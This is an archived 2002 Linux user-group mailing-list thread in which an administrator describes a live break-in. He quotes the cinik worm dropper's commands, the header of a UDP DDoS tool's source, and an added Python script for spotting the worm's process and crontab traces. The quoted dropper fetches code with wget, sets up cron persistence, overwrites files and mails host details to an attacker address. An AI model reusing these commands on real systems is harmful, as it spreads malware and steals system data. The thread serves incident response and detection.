[ale] Under attack! (html encoding alert)

Matthew Brown matthew.brown at cordata.net
Tue Sep 24 08:16:16 EDT 2002



Good luck.  They have never returned any of my phone calls.  If you get
through to a human, I'd love to know!

Best regards,
Matthew Brown, President
CorData, Inc.
O: (770) 795-0089
F: (404) 806-4855
E: matthew.brown at cordata.net

  
-----Original Message-----
From: James P. Kinney III [mailto:jkinney at localnetsolutions.com]
Sent: Tuesday, September 24, 2002 1:26 AM
To: Atlanta Linux User Group (E-mail)
Subject: [ale] Under attack! (html encoding alert)

Sorry for the html, having a bit of a problem right now.

I stumbled across a cracker getting into my box.  May have come in through
apache as the username on the installed app is apache.  (httpd error log
looks like openssl attack. openssl was NOT upgraded <doh!>)

In ps, I saw:

    21236 ?        S     96:33 /tmp/.cinik 63.238.109.140

Which is NOT something of mine. I was investigating a possible intrusion on
another machine and did a ping on an IP address that someone had telneted in
from on this client's machine. It was a live address with no DNS records and
it suddenly went dark. A few minutes later, I noticed the connection lights
on my DSL staying active for much longer than getting email. Saw the above
process running on the webserver.

Ran "strings" on the found worm file. Some interesting stuff from that:

    /usr/bin/wget http://zamfy.home.ro/0/cinik.c
    mv /tmp/cinik.c /tmp/.cinik.c
    echo -e 'chmod a+x $i
    echo 1 `/bin/date +%H` \* \* \* $i %s \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go
    echo '# ale altora'>> /tmp/.cinik.go          # Romanian: "other people's" (files)
    echo 'for i in `/usr/bin/find /usr /var /tmp /home /mnt -type f -perm 7 2>/dev/null`'>> /tmp/.cinik.go
    echo 'do'>> /tmp/.cinik.go
    echo ' cat /tmp/.cinik > $i'>> /tmp/.cinik.go
    echo ' chmod a+x $i'>> /tmp/.cinik.go
    echo ' echo 2 `/bin/date +%H` \* \* \* $i %1 \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go
    echo 'done'>> /tmp/.cinik.go
    echo ' '>> /tmp/.cinik.go
    echo '# directoarele mele'>> /tmp/.cinik.go   # Romanian: "my directories"
    echo 'for i in `/usr/bin/find /usr /var /tmp /home /mnt -type d -uid $myid`'>> /tmp/.cinik.go
    echo ' cat /tmp/.cinik > $i/.cinik'>> /tmp/.cinik.go
    echo ' chmod a+x $i/.cinik'>> /tmp/.cinik.go
    echo ' echo 3 `/bin/date +%H` \* \* \* $i/.cinik %1 \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go
    echo 'echo PROC > /tmp/.cinik.status'>> /tmp/.cinik.go
    echo 'cat /proc/cpuinfo >> /tmp/.cinik.status'>> /tmp/.cinik.go
    echo 'echo MEM >> /tmp/.cinik.status'>> /tmp/.cinik.go
    echo 'cat /usr/bin/free >> /tmp/.cinik.status'>> /tmp/.cinik.go
    echo 'echo HDD >> /tmp/.cinik.status'>> /tmp/.cinik.go
    echo 'cat /bin/df -h >> /tmp/.cinik.status'>> /tmp/.cinik.go
    echo 'echo IP >> /tmp/.cinik.status'>> /tmp/.cinik.go
    echo 'cat /sbin/ifconfig >> /tmp/.cinik.status'>> /tmp/.cinik.go
    echo 'myip=`/sbin/ifconfig eth0 | head -2 | tail -1 | cut -d: -f2 | cut -d" " -f1`'>> /tmp/.cinik.go
    echo 'mail cinik_worm at yahoo.com -s "$myip" < /tmp/cinik.status'>> /tmp/.cinik.go
    echo 'rm -f /tmp/cinik.status'>> /tmp/.cinik.go
    chmod a+x /tmp/.cinik.go;/tmp/.cinik.go;exit

This was from running strings on the lastlog in /var/log:

    # strings lastlog
    171.118.33.65.cfl.rr.com
    1-020.adsl.cyberlink.ch

But the real clincher is I caught the bastard in the act and got the source
code intact! From the file /tmp/.cinik.c:

    /****************************************************************************
    *                                                                          *
    *           Peer-to-peer UDP Distributed Denial of Service (PUD)           *
    *                         by contem at efnet                               *
    *                                                                          *
    *         Virtually connects computers via the udp protocol on the         *
    *  specified port.  Uses a newly created peer-to-peer protocol that        *
    *  incorperates uses on unstable or dead computers.  The program is        *
    *  ran with the parameters of another ip on the virtual network.  If       *
    *  running on the first computer, run with the ip 127.0.0.1 or some        *
    *  other type of local address.  Ex:                                       *
    *                                                                          *
    *           Computer A:   ./program 127.0.0.1                              *
    *           Computer B:   ./program Computer_A                             *
    *           Computer C:   ./program Computer_A                             *
    *           Computer D:   ./program Computer_C                             *
    *                                                                          *
    *         Any form of that will work.  The linking process works by        *
    *  giving each computer the list of avaliable computers, then              *
    *  using a technique called broadcast segmentation combined with TCP       *
    *  like functionality to insure that another computer on the network       *
    *  receives the broadcast packet, segments it again and recreates          *
    *  the packet to send to other hosts.  That technique can be used to       *
    *  support over 16 million simutaniously connected computers.              *
    *                                                                          *
    *         Thanks to ensane and st for donating shells and test beds        *
    *  for this program.  And for the admins who removed me because I          *
    *  was testing this program (you know who you are) need to watch           *
    *  their backs.                                                            *
    *                                                                          *
    *         I am not responsible for any harm caused by this program!        *
    *  I made this program to demonstrate peer-to-peer communication and       *
    *  should not be used in real life.  It is an education program that       *
    *  should never even be ran at all, nor used in any way, shape or          *
    *  form.  It is not the authors fault if it was used for any purposes      *
    *  other than educational.                                                 *
    *                                                                          *
    *                                                                          *
    *      A FEW MODIFICATIONS MADE BY CiNIK FOR BETTER HIDING ON THE VICTIM   *
    *                                                                          *
    *                                                                          *
    ****************************************************************************/

So now I'm getting pounded by UDP packets in a DoS from at least 18 IPs.
This is going to the FBI.

      -- 
James P. Kinney III   \Changing the mobile computing world/
President and CEO      \          one Linux user         /
Local Net Solutions,LLC \           at a time.          /
770-493-8244             \.___________________________./

GPG ID: 829C6CA7 James P. Kinney III (M.S. Physics) <jkinney at localnetsolutions.com>
Fingerprint = 3C9E 6366 54FC A3FE BA4D 0659 6190 ADC3 829C 6CA7 
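For anyone triaging the same dropper on another box, here is a small Python helper. It is added here as an example and is not code from the thread or from the worm itself. The ps and crontab samples are constructed to mirror the process line and the crontab template quoted above, and the pattern and function names are mine.

```python
"""Triage helper for the cinik-style indicators quoted in this thread.

Added example, not code from the thread or from the worm. Regexes, function
names and the SAMPLE_* inputs below are my own; the samples are constructed
to mirror the ps line and the crontab template James posted.
"""
import re
from typing import Dict, List

# ps -ax style line: PID TTY STAT TIME COMMAND [ARGS...]
PS_LINE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")
# The dropper's crontab template: "<n> <HH> * * * <path> <arg> > /dev/null 2>&1"
CRON_LINE = re.compile(
    r"^\s*(\d{1,2})\s+(\d{1,2})\s+\*\s+\*\s+\*\s+(\S+)\s+(\S+)\s*>\s*/dev/null\s+2>&1\s*$"
)
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed sample input (not a capture from the thread's machine).
SAMPLE_PS = """\
  PID TTY      STAT   TIME COMMAND
  612 ?        S      0:01 /usr/sbin/httpd
21236 ?        S     96:33 /tmp/.cinik 63.238.109.140
21240 ?        S      0:00 /usr/bin/wget http://zamfy.home.ro/0/cinik.c
"""
SAMPLE_CRONTAB = """\
0 4 * * * /usr/bin/updatedb > /dev/null 2>&1
1 13 * * * /tmp/.cinik 63.238.109.140 > /dev/null 2>&1
3 13 * * * /var/www/html/.cinik %1 > /dev/null 2>&1
"""


def is_hidden_tmp_binary(path: str) -> bool:
    """Dot-file executables under /tmp or /var/tmp, where the dropper stages itself."""
    return path.startswith("/tmp/.") or path.startswith("/var/tmp/.")


def suspicious_processes(ps_output: str) -> List[Dict[str, str]]:
    """Flag processes whose binary is a hidden /tmp file launched with an IP argument
    (the '/tmp/.cinik 63.238.109.140' shape: the PUD node takes a peer IP as argv[1])."""
    hits = []
    for line in ps_output.splitlines():
        m = PS_LINE.match(line)
        if not m:
            continue
        argv = m.group(5).split()
        if len(argv) >= 2 and is_hidden_tmp_binary(argv[0]) and IPV4.match(argv[1]):
            hits.append({"pid": m.group(1), "binary": argv[0], "peer": argv[1]})
    return hits


def suspicious_cron_entries(crontab_text: str) -> List[Dict[str, str]]:
    """Flag crontab lines matching the dropper's template: a dot-file command with
    one argument, output discarded to /dev/null, run once a day at the hour the
    dropper was installed (`date +%H`) and a fixed minute (1, 2 or 3)."""
    hits = []
    for line in crontab_text.splitlines():
        m = CRON_LINE.match(line)
        if not m:
            continue
        minute, hour, command, arg = m.groups()
        if command.rsplit("/", 1)[-1].startswith("."):
            hits.append({"minute": minute, "hour": hour, "command": command, "arg": arg})
    return hits


def dropper_overwrites(mode: int) -> bool:
    """The '# ale altora' loop selects victims with 'find ... -type f -perm 7'.
    GNU find treats a bare mode as an exact match, so only files whose permission
    bits are exactly 0007 (rwx for others, nothing for owner or group) are
    overwritten with the worm body; an ordinary 0755 binary is left alone."""
    return (mode & 0o777) == 0o007


if __name__ == "__main__":
    for hit in suspicious_processes(SAMPLE_PS):
        print("process:", hit)
    for hit in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", hit)
    for mode in (0o007, 0o755, 0o777):
        print(f"mode {mode:04o} overwritten by dropper: {dropper_overwrites(mode)}")
```

On a live box you would feed it `ps ax` and `crontab -l -u apache` output instead of the samples; the cron check is the useful one, since the worm re-registers itself from every crontab entry it planted even after the /tmp copy is removed.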